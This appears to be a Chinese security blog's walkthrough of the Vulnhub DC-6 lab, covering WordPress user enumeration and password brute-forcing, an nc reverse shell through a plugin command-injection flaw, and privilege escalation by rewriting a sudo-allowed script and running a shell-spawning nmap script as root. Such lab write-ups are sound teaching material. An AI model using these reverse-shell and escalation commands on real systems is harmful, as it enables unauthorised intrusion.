免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览
这是网络安全自修室每周带星球小伙伴一起实战的第5台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!
攻击机:Kali Linux
靶机环境:192.168.241.139
所用工具:nmap | wpscan | nc | BurpSuite
发现打开的端口是80
和 22
sudo masscan --min-rate=10000 192.168.241.139 -p-
对存在的端口进行详细的服务探测
sudo nmap -O -sC -sV 192.168.241.139 -p 80,22 -oN 139.xml
综上信息搜集可以发现,该目标系统为Linux,开放22和80端口,其中web服务是用的
Wordpress
框架,根据经验,重点从web上突破,考虑用字典爆破后台和ssh服务的账号密码
值得注意的是:发现开了80端口却无法访问,是重定向到wordy域名 可在如下hosts文件中添加ip对应域名
win10路径:C:\Windows\System32\drivers\etc\hosts
linux路径:etc/hosts
使用工具wpscan枚举用户,获取到5个用户,保存为users.txt
wpscan --url wordy -e u
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
既然有用户,就只需要找密码本进行爆破即可,这边看到官方有提示,可以提取k01
的密码,可以节省爆破时间
根据提示生成密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
开始暴力破解
wpscan --url http://wordy/ -U users.txt -P passwords.txt
获取到账号密码 mark
helpdesk01
进入后台发现有个active管理插件命令执行漏洞
直接抓包使用nc反弹shell
nc 192.168.241.129 2222 -e /bin/bash
itkjz
获取交互shell
python -c "import pty;pty.spawn('/bin/bash')"
root@bbkali:/tmp/dc6# nc -lvp 2222
listening on [any] 2222 ...
connect to [192.168.241.129] from wordy [192.168.241.139] 36108
python -c "import pty;pty.spawn('/bin/bash')"
常规翻看目录,发现有价值提示to-do-sometings.txt
www-data@dc-6:/home$ ls -R
.:
graham jens mark sarah
./graham:
./jens:
backups.sh
./mark:
stuff
./mark/stuff:
things-to-do.txt
./sarah:
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
发现graham密码`GSo7isUM1D4
ssh登录graham发现backups.txt可利用提权
graham@dc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/home$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
直接将nc命令加入backups.sh
graham@dc-6:/home/jens$ cat backups.sh
nc 192.168.241.129 2223 -e /bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
获取到jens权限,发现能以root用户免密码执行nmap
pwd
/home
whoami
jens
sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
写个nmap脚本
echo 'os.execute("/bin/sh")' > root.nse
运行该脚本获取root权限并拿到flag
sudo nmap --script=/home/jens/root.nse
jens@dc-6:~$ sudo nmap --script=/home/jens/root.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST
# pwd
/home/jens
# whoami
root
# cd /root
# s^H
/bin/sh: 4: : not found
# ls
theflag.txt
# cat theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.